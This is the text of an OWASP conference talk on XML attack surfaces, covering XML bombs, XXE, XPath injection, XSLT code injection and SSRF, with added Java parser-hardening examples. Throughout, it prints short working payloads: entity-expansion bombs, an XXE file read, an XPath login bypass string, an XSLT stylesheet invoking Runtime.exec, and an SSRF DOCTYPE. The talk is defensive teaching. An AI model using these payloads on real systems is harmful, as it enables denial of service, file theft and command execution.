XML processing security vulnerabilities and how to avoid them.
OWASP
Pierre Ernst, 2013
XML Attack Surface
Business Analytics Security Competency Group
XML is Pervasive
XML intro
■ Born in 1998 (see initial specifications)
■ Data interchange format
– International languages support
– Text based
– Human readable
■ Parsers
– DOM
– SAX, rooted in Ottawa (see bio)
– StAX
■ Complementary technologies and standards
– XML Validation (DTD, XSD, ...)
– XML Transformation (XSLT)
– XML Query (XQuery, XPath)
Is XML Secure?
■ Nothing wrong with the standard itself
■ Most vulnerabilities due to
– Libraries/Tools misconfiguration
– Insufficient validation of untrusted input
■ Known, reported security vulnerabilities (see CVE search)
XML Bomb
■ CWE-776: Denial of service (memory exhaustion)
■ Amit Klein, 2002 (see BugTraq)
■ XML entity expansion
<!DOCTYPE ibm [
  <!ENTITY ernst128 "pierre">
  <!ENTITY ernst127 "&ernst128;&ernst128;">
  ...
  <!ENTITY ernst002 "&ernst003;&ernst003;">
  <!ENTITY ernst001 "&ernst002;&ernst002;">
  <!ENTITY ernst000 "&ernst001;&ernst001;">
]>
<ibm>&ernst000;</ibm>
Modus Operandi
1. Attacker → Vulnerable Server: POST /request HTTP/1.1 with body <ibm>&ernst000;</ibm>
2. Server expands the entities: <ibm>&ernst001;&ernst001;</ibm>, then <ibm>&ernst002;&ernst002;&ernst002;&ernst002;</ibm>, then <ibm>&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;</ibm>, doubling at every level
Demo #1: Server Crash with XML Bomb
(Source code available on demand)
Variation: “Quadratic Blowup Attack”
■ Amit Klein (see MSDN article)
■ Uses one single entity of size 50KB
■ Reference the entity 50,000 times
■ Useful to bypass FEATURE_SECURE_PROCESSING protection
– Limits entity expansions to
• 100,000 (IBM)
• 64,000 (Oracle)
<!DOCTYPE pierre [
  <!ENTITY e "eeeeeeeeeeee...eeeeeeeee">
]>
<pierre>&e;&e;&e;...&e;&e;&e;</pierre>
Protection
DOM, SAX:
  factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
StAX:
  factory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
External Entity Reference (XXE)
■ CWE-611: Information Disclosure
■ Gregory Steuck, 2002 (see BugTraq)
■ Requires the server to include user-supplied data in the response
<!DOCTYPE pierre [
  <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">
]>
<pierre>&ernst;</pierre>
Modus Operandi
1. Attacker → Vulnerable Server: POST /request HTTP/1.1 with body <pierre> &ernst;</pierre>
2. Server resolves the external entity: <pierre>[... content of the file on the server...]</pierre>
3. Server → Attacker: HTTP/1.1 200 OK, Content-Type: text/xml, body <response> Unknown service [... content of the file on the server...]</response>
Demo #2: File Content Disclosure with XXE
(Source code available on demand)
Protection
DOM, SAX:
  factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
StAX:
  factory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
Blind Xpath Injection (“XML Injection”)
■ CWE-643: Abuse of Functionality
■ Amit Klein, 2004 (see white-paper)
■ User input is embedded as-is in Xpath statement
<users>
  <user>
    <name>pierre</name>
    <password>i8simon</password>
  </user>
  <user>
    <name>trevor</name>
    <password>mee2</password>
  </user>
</users>
Login form with name “pierre” and password “i8simon” produces:
//users/user[name/text()='pierre' and password/text()='i8simon']/name/text()
Login form with name and password both set to ' or ''=' produces:
//users/user[name/text()='' or ''='' and password/text()='' or ''='']/name/text()
Modus Operandi
1. Attacker → Vulnerable Server: POST /login HTTP/1.1 with the injected name and password
2. Server evaluates //users/user[name/text()='' or ''='' and password/text()='' or ''='']/name/text()
3. Server → Attacker: HTTP/1.1 200 OK, Content-Type: text/html, body containing pierretrevor (both user names)
Demo #3: Blind Xpath Injection
(Source code available on demand)
Variation: Read System Properties
■ JAXP implementation:
– IBM
– Oracle
■ Interesting properties:
– os.version
– user.name
– java.class.path
– sun.java.command
system-property('sun.java.command')
Protection
■ Input Validation.
■ “[A-Za-z0-9_\-]+” in our example.
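The allowlist above, with XPath variable binding added as a second layer so that the query text itself never changes. This is an added example, not code from the slides; it assumes the JDK's built-in JAXP XPath (Java 9 or later for Map.of) and reuses the users document shown two slides earlier as constructed input.

```java
import java.io.StringReader;
import java.util.Map;
import java.util.regex.Pattern;
import javax.xml.namespace.QName;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

public class XPathLogin {
    // Constructed copy of the users document from the slide.
    static final String USERS =
        "<users><user><name>pierre</name><password>i8simon</password></user>"
      + "<user><name>trevor</name><password>mee2</password></user></users>";

    // Allowlist from the slide: no quotes, brackets or whitespace can get through.
    static final Pattern SAFE = Pattern.compile("[A-Za-z0-9_\\-]+");

    // Returns the authenticated user's name, or "" when input is rejected or nothing matches.
    public static String login(String name, String password) throws Exception {
        if (!SAFE.matcher(name).matches() || !SAFE.matcher(password).matches()) {
            return ""; // input validation, as the slide recommends
        }
        Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder()
            .parse(new InputSource(new StringReader(USERS)));
        XPath xpath = XPathFactory.newInstance().newXPath();
        // Second layer: bind the values as XPath variables. The expression is a
        // constant, so even a quote that slipped past the allowlist stays data.
        Map<String, String> vars = Map.of("name", name, "password", password);
        xpath.setXPathVariableResolver((QName q) -> vars.get(q.getLocalPart()));
        return xpath.evaluate(
            "//users/user[name/text()=$name and password/text()=$password]/name/text()", doc);
    }

    public static void main(String[] args) throws Exception {
        System.out.println("valid login -> '" + login("pierre", "i8simon") + "'");
        System.out.println("injection attempt -> '" + login("' or ''='", "' or ''='") + "'");
    }
}
```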
Code Injection during XSLT
■ CWE-94: Improper Control of Generation of Code
■ When the attacker can control the XML style sheet applied to an XML document.
■ Uses transformer engine extension capabilities
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="xalan://java.lang.Runtime"
    exclude-result-prefixes="rt">
  <xsl:template match="/">
    <xsl:variable name="obj" select="rt:getRuntime()"/>
    <xsl:value-of select="rt:exec($obj,'calc.exe')"/>
  </xsl:template>
</xsl:stylesheet>
Modus Operandi
1. Attacker → Vulnerable Server: GET /request?doc=...&stylesheet=... HTTP/1.1
2. Server obtains <doc>whatever</doc> and <stylesheet>malicious</stylesheet> from the request
3. Server applies the stylesheet: load class java.lang.Runtime, call exec() method
Demo #4: Remote OS Command Injection
(Source code available on demand)
Variation #1: Universal XXE
<!DOCTYPE xsl:stylesheet [
  <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/"> &ernst; </xsl:template>
</xsl:stylesheet>
■ “Universal”: you always see the entity in the response
Variation #2: Infinite Loop
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template name="loop">
    <xsl:call-template name="loop"/>
  </xsl:template>
  <xsl:template match="/">
    <xsl:call-template name="loop"/>
  </xsl:template>
</xsl:stylesheet>
Variation #3: Cross-Site Scripting (XSS)
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:xhtml="http://www.w3.org/1999/xhtml">
  <xsl:output method="html"/>
  <xsl:template match="/">
    <xhtml:script>alert('XSS');</xhtml:script>
  </xsl:template>
</xsl:stylesheet>
Protection
■ Several ways to abuse XML Stylesheet Transforms.
■ Users should never be able to use custom XML stylesheets.
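One way to apply the rule above in code, as an added example that is not part of the presentation: the client selects a server-owned stylesheet by key and never supplies one, and the TransformerFactory is hardened as a second layer rather than a substitute for that rule. It assumes the JDK's built-in TransformerFactory (XSLTC, Java 7u40 or later, which accepts the ACCESS_EXTERNAL_* attributes); the stylesheet map, key and probe document are constructed.

```java
import java.io.StringReader;
import java.io.StringWriter;
import java.util.Map;
import javax.xml.XMLConstants;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;
public class ServerSideXslt {
    // Only stylesheets the server ships are ever applied; the client picks a key, never the sheet.
    static final Map<String, String> SHEETS = Map.of("plain",
        "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">"
      + "<xsl:template match=\"/\"><xsl:value-of select=\"/doc\"/></xsl:template></xsl:stylesheet>");

    public static TransformerFactory hardenedFactory() throws TransformerConfigurationException {
        TransformerFactory tf = TransformerFactory.newInstance();
        // Secure processing: the JDK's XSLTC refuses extension functions (e.g. rt:getRuntime()) at compile time.
        tf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // No xsl:import/xsl:include or DTD fetches over any protocol (closes the SSRF path too).
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        return tf;
    }

    // Applies a server-owned stylesheet, selected by key, to the client's document.
    public static String render(String sheetKey, String xml) throws Exception {
        String sheet = SHEETS.get(sheetKey);
        if (sheet == null) throw new IllegalArgumentException("unknown stylesheet: " + sheetKey);
        Transformer t = hardenedFactory().newTransformer(new StreamSource(new StringReader(sheet)));
        StringWriter out = new StringWriter();
        t.transform(new StreamSource(new StringReader(xml)), new StreamResult(out));
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        System.out.println(render("plain", "<doc>whatever</doc>"));
        // Constructed probe: a client-supplied sheet reaching for java.lang.Runtime, as on the slide.
        String probe = "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\""
            + " xmlns:rt=\"xalan://java.lang.Runtime\"><xsl:template match=\"/\">"
            + "<xsl:value-of select=\"rt:getRuntime()\"/></xsl:template></xsl:stylesheet>";
        try {
            hardenedFactory().newTransformer(new StreamSource(new StringReader(probe)));
            System.out.println("unexpected: extension call compiled");
        } catch (TransformerConfigurationException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```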
Server Side Request Forgery (SSRF)
■ CWE-601: Open Redirect, but server-to-server
■ {Nathan Hamiel, Shawn Moyer}, 2009 (ShmooCon)
■ XML vectors:
– Xml eXternal Entities (XXE)
– Xinclude
– External Doctype inclusion:
<!DOCTYPE PIERRE PUBLIC "ernst" "http://intranet:666/start-armageddon">
<pierre/>
Modus Operandi
1. Attacker → Vulnerable Server: POST /request HTTP/1.1, Content-Type: application/xml, Content-Length: 666, body <?xml version="1.0"?>...
2. Vulnerable Server → Internal Service: the parser fetches the external DOCTYPE URL (response: whatever)
Protection
DOM, SAX:
  factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
StAX:
  factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
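The three Protection slides (XML bomb, XXE, SSRF) rely on the same settings; this added example, not code from the slides, puts them together for DOM, SAX and StAX and shows a DOCTYPE being refused before any entity is declared. It assumes the JDK's built-in Xerces-derived parsers, which understand the Apache feature URI; the XInclude, FEATURE_SECURE_PROCESSING and IS_SUPPORTING_EXTERNAL_ENTITIES settings are additions beyond the slides, and the sample document is constructed.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.stream.XMLInputFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;
public class HardenedXmlFactories {
    // DOM: refuse the DOCTYPE itself. No DTD means no internal entities to expand
    // (XML bomb, quadratic blowup) and no SYSTEM/PUBLIC identifiers to fetch (XXE, SSRF).
    public static DocumentBuilderFactory dom() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true); // second layer, not sufficient alone
        f.setXIncludeAware(false);            // XInclude is the other SSRF vector on the slides
        f.setExpandEntityReferences(false);
        return f;
    }

    // SAX: same Xerces feature string, same effect.
    public static SAXParserFactory sax() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        return f;
    }

    // StAX has no disallow-doctype feature: switch off DTD support and entity
    // replacement (the two properties from the slides), plus external entities.
    public static XMLInputFactory stax() {
        XMLInputFactory f = XMLInputFactory.newInstance();
        f.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        f.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
        f.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        return f;
    }

    // Constructed sample: a harmless one-entity document that still declares a DOCTYPE.
    static final String WITH_DOCTYPE = "<!DOCTYPE ibm [<!ENTITY e \"x\">]><ibm>&e;</ibm>";
    public static void main(String[] args) throws Exception {
        try {
            dom().newDocumentBuilder().parse(new InputSource(new StringReader(WITH_DOCTYPE)));
            System.out.println("unexpected: DOCTYPE accepted");
        } catch (SAXParseException e) {
            System.out.println("rejected before any entity was declared: " + e.getMessage());
        }
    }
}
```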
Variation: Exotic Java URL Handlers
■ {Alexander Polyakov, Dmitry Chastukhin, Alexey Tyurin}, 2012 (CVE-2012-5085)
Conclusions
■ Always configure your XML parsers to disallow Doctype.
– From a server's perspective, clients should not be able to define the grammar of the request anyway
– Secure Processing Flag is not enough
– Preventing external entity expansion is not enough
■ XPath: validate user's input
■ XSLT: avoid at any cost
■ Always apply Java patches from vendors
Pierre Ernst
■ 10 years as Software Developer
■ 5 years as Penetration Tester
– 750+ vulns
– Manual Code Review
– Manual Black Box Testing
– Java, XML, Open Source, …
https://twitter.com/e_rnst
http://ca.linkedin.com/in/pernst
pierre.ernst@gmail.com
Questions & Answers